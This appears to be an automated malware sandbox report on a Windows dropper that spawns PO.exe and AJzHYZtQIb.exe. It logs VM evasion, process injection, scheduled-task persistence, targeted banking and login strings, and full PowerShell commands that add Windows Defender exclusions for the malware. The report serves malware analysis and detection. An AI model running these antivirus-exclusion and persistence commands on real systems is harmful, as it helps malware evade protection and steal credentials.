                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: F20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 29A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: F20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 8DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 9DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 9FE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: AFE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 2F70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 3180000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 2FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2CC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2F60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2CC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 8F00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 78A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 8F00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 10D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2DF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6787
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1105
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8020
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1006
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWindow / User API: threadDelayed 1705
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWindow / User API: threadDelayed 4241
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWindow / User API: threadDelayed 1893
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWindow / User API: threadDelayed 6517
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7832Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 3292Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 8136Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 4996Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 8060Thread sleep time: -23058430092136925s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7060Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001986E8 FindFirstFileExA,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018BC1D VirtualQuery,GetSystemInfo,
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: tmp37DC.tmp.14.drBinary or memory string: discord.comVMware20,11696428655f
                      Source: tmp37DC.tmp.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: global block list test formVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: tmp37DC.tmp.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: tmp37DC.tmp.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: tmp37DC.tmp.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: tmp37DC.tmp.14.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: tmp37DC.tmp.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2356294737.000000000118F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: tmp37DC.tmp.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: tmp37DC.tmp.14.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: AJzHYZtQIb.exe, 00000010.00000002.2243982983.00000000012B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: tmp37DC.tmp.14.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: tmp37DC.tmp.14.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: PO.exe, 00000007.00000002.2162816611.0000000007044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: tmp37DC.tmp.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: tmp37DC.tmp.14.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: tmp37DC.tmp.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: tmp37DC.tmp.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001953C2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001993D0 GetProcessHeap,
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001912B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D3E5 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018C69D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory written: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory written: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D05E cpuid
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: GetLocaleInfoW,GetNumberFormatW,
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
